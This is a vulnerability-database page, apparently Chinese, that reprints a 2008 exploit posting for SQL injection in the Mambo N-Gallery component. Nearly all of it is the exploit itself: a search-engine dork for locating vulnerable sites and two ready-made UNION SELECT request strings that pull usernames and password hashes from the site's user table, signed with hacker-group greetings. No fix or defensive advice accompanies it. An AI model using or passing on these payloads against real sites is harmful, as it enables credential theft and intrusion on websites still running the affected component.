Mambo Component N-Gallery - Multiple SQL Injections

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056717 漏洞类型
发布时间 2008-06-30 更新时间 2008-06-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/5980
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
###########################################
#                                         #
# Mambo Component n-gallery SQL Injection #
#                                         # 
###########################################
#                                         #
##Author : AlbaniaN-[H]                   # 
#                                         #
###Site : http://www.khg-crew.ws          #
#                                         #
####Home Page : http://www.vaalon.org     #
#                                         #
#####Email : valion@khg-crew.ws           #
#                                         #
###########################################
#                                         #
# DORK : allinurl:"com_n-gallery"         #
#                                         #  
###########################################
#                                         #
##############################################################################################################################################################
#            #                                                                                                                                               #
#Exploit 1 : #                                                                                                                                               #
#            #################################################################################################################################################
#                                                                                                                                                            #
# index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users--                                              #
#                                                                                                                                                            #
##############################################################################################################################################################
#            #                                                                                                                                               #
#Exploit 2 : #                                                                                                                                               #
#            #################################################################################################################################################
#                                                                                                                                                            #
# index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/* #
#                                                                                                                                                            #
##############################################################################################################################################################
#          Kosova Hackers Group           # 
###########################################
#             AlbaniaN-[H]                #
###########################################
#         Republic of Kosova (K)          # 
###########################################
#      Greetings to: urtan,redc00de       # 
###########################################
#    & all Kosova Hackers Group           # 
###########################################
#&all muslim peoples all over the world :)#
###########################################

# milw0rm.com [2008-06-30]